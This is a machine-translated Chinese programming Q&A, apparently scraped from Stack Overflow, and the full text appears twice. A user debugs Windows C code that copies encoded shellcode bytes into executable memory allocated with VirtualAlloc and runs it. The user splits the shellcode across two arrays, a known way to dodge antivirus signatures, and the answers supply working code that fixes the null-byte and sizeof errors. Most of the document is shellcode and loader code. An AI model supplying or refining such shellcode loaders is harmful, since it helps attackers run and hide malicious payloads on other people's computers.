运行 shellcode 存储在动态允许的内存中
run shellcode stored in dynamically allowed memory
我有以下 运行 可以正常工作的 shellcode:
unsigned char original[] =
"\xd9\xee\xd9\x74\x24\xf4\x58\xbb\xa6\xfb\x51\x8f\x33\xc9\xb1"
"\x62\x83\xe8\xfc\x31\x58\x16\x03\x58\x16\xe2\x53\x07\xb9\x0d"
"\x9b\xf8\x3a\x72\x12\x1d\x0b\xb2\x40\x55\x3c\x02\x03\x3b\xb1"
"\xe9\x41\xa8\x42\x9f\x4d\xdf\xe3\x2a\xab\xee\xf4\x07\x8f\x71"
;
void *exec = VirtualAlloc(0, sizeof original, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, original, sizeof original);
((void(*)())exec)();
当我尝试 运行 存储在 2 个不同数组中的相同 shellcode 时,我遇到了访问冲突:
unsigned char part1[] =
"\xd9\xee\xd9\x74\x24\xf4\x58\xbb\xa6\xfb\x51\x8f\x33\xc9\xb1"
"\x62\x83\xe8\xfc\x31\x58\x16\x03\x58\x16\xe2\x53\x07\xb9\x0d"
;
unsigned char part2[] = "\x9b\xf8\x3a\x72\x12\x1d\x0b\xb2\x40\x55\x3c\x02\x03\x3b\xb1"
"\xe9\x41\xa8\x42\x9f\x4d\xdf\xe3\x2a\xab\xee\xf4\x07\x8f\x71";
//build the final shellcode array
unsigned char * concatenation = (unsigned char*)malloc(sizeof (part1)+sizeof(part2)+1);
//concatenation
memcpy(concatenation, part1, sizeof part1);
memcpy(concatenation + sizeof part1 , part2, sizeof part2);
//allocationg memory and running it
void *exec = VirtualAlloc(0, sizeof concatenation, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, concatenation, sizeof concatenation);
((void(*)())exec)();
我正在尝试使第二个示例正常运行,但我遇到了访问冲突错误。
我究竟做错了什么 ?
谢谢。
更新
根据 alain 和三十二上校的建议修改后的代码,我现在得到以下错误:"test.exe has triggered a breakpointt"
unsigned char part1[] =
"\xd9\xee\xd9\x74\x24\xf4\x58\xbb\xa6\xfb\x51\x8f\x33\xc9\xb1"
"\x62\x83\xe8\xfc\x31\x58\x16\x03\x58\x16\xe2\x53\x07\xb9\x0d"
;
unsigned char part2[] = "\x9b\xf8\x3a\x72\x12\x1d\x0b\xb2\x40\x55\x3c\x02\x03\x3b\xb1"
"\xe9\x41\xa8\x42\x9f\x4d\xdf\xe3\x2a\xab\xee\xf4\x07\x8f\x71";
unsigned char * concatenation = (unsigned char*)malloc(sizeof (part1)+sizeof(part2));
memcpy(concatenation, part1-1, sizeof part1);
memcpy(concatenation + sizeof part1 , part2, sizeof part2);
printf("%d", sizeof(original));
void *exec = VirtualAlloc(0, sizeof (*concatenation), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, concatenation, sizeof(*concatenation));
((void(*)())exec)();
工作代码:
unsigned char * concatenation = (unsigned char*)malloc(sizeof (part1)+sizeof(part2));
memcpy(concatenation, part1, sizeof part1);
memcpy(concatenation + sizeof part1-1, part2, sizeof part2);
void *exec = VirtualAlloc(0, sizeof(part1) + sizeof(part2), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, concatenation, sizeof(part1)+sizeof(part2));
((void(*)())exec)();
一个字符串文字以空字符结尾,并且以 sizeof 计算终止的空字节。因此,当使用 2 数组版本时,最终数组的中间有一个空字节。
如果你改变
memcpy(concatenation + sizeof part1 , part2, sizeof part2);
到
memcpy(concatenation + sizeof part1 - 1, part2, sizeof part2);
我觉得应该可以。
正如三十二上校所指出的,sizeof concatenation也有错误。
我有以下 运行 可以正常工作的 shellcode:
unsigned char original[] =
"\xd9\xee\xd9\x74\x24\xf4\x58\xbb\xa6\xfb\x51\x8f\x33\xc9\xb1"
"\x62\x83\xe8\xfc\x31\x58\x16\x03\x58\x16\xe2\x53\x07\xb9\x0d"
"\x9b\xf8\x3a\x72\x12\x1d\x0b\xb2\x40\x55\x3c\x02\x03\x3b\xb1"
"\xe9\x41\xa8\x42\x9f\x4d\xdf\xe3\x2a\xab\xee\xf4\x07\x8f\x71"
;
void *exec = VirtualAlloc(0, sizeof original, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, original, sizeof original);
((void(*)())exec)();
当我尝试 运行 存储在 2 个不同数组中的相同 shellcode 时,我遇到了访问冲突:
unsigned char part1[] =
"\xd9\xee\xd9\x74\x24\xf4\x58\xbb\xa6\xfb\x51\x8f\x33\xc9\xb1"
"\x62\x83\xe8\xfc\x31\x58\x16\x03\x58\x16\xe2\x53\x07\xb9\x0d"
;
unsigned char part2[] = "\x9b\xf8\x3a\x72\x12\x1d\x0b\xb2\x40\x55\x3c\x02\x03\x3b\xb1"
"\xe9\x41\xa8\x42\x9f\x4d\xdf\xe3\x2a\xab\xee\xf4\x07\x8f\x71";
//build the final shellcode array
unsigned char * concatenation = (unsigned char*)malloc(sizeof (part1)+sizeof(part2)+1);
//concatenation
memcpy(concatenation, part1, sizeof part1);
memcpy(concatenation + sizeof part1 , part2, sizeof part2);
//allocationg memory and running it
void *exec = VirtualAlloc(0, sizeof concatenation, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, concatenation, sizeof concatenation);
((void(*)())exec)();
我正在尝试使第二个示例正常运行,但我遇到了访问冲突错误。 我究竟做错了什么 ? 谢谢。
更新
根据 alain 和三十二上校的建议修改后的代码,我现在得到以下错误:"test.exe has triggered a breakpointt"
unsigned char part1[] =
"\xd9\xee\xd9\x74\x24\xf4\x58\xbb\xa6\xfb\x51\x8f\x33\xc9\xb1"
"\x62\x83\xe8\xfc\x31\x58\x16\x03\x58\x16\xe2\x53\x07\xb9\x0d"
;
unsigned char part2[] = "\x9b\xf8\x3a\x72\x12\x1d\x0b\xb2\x40\x55\x3c\x02\x03\x3b\xb1"
"\xe9\x41\xa8\x42\x9f\x4d\xdf\xe3\x2a\xab\xee\xf4\x07\x8f\x71";
unsigned char * concatenation = (unsigned char*)malloc(sizeof (part1)+sizeof(part2));
memcpy(concatenation, part1-1, sizeof part1);
memcpy(concatenation + sizeof part1 , part2, sizeof part2);
printf("%d", sizeof(original));
void *exec = VirtualAlloc(0, sizeof (*concatenation), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, concatenation, sizeof(*concatenation));
((void(*)())exec)();
工作代码:
unsigned char * concatenation = (unsigned char*)malloc(sizeof (part1)+sizeof(part2));
memcpy(concatenation, part1, sizeof part1);
memcpy(concatenation + sizeof part1-1, part2, sizeof part2);
void *exec = VirtualAlloc(0, sizeof(part1) + sizeof(part2), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, concatenation, sizeof(part1)+sizeof(part2));
((void(*)())exec)();
一个字符串文字以空字符结尾,并且以 sizeof 计算终止的空字节。因此,当使用 2 数组版本时,最终数组的中间有一个空字节。
如果你改变
memcpy(concatenation + sizeof part1 , part2, sizeof part2);
到
memcpy(concatenation + sizeof part1 - 1, part2, sizeof part2);
我觉得应该可以。
正如三十二上校所指出的,sizeof concatenation也有错误。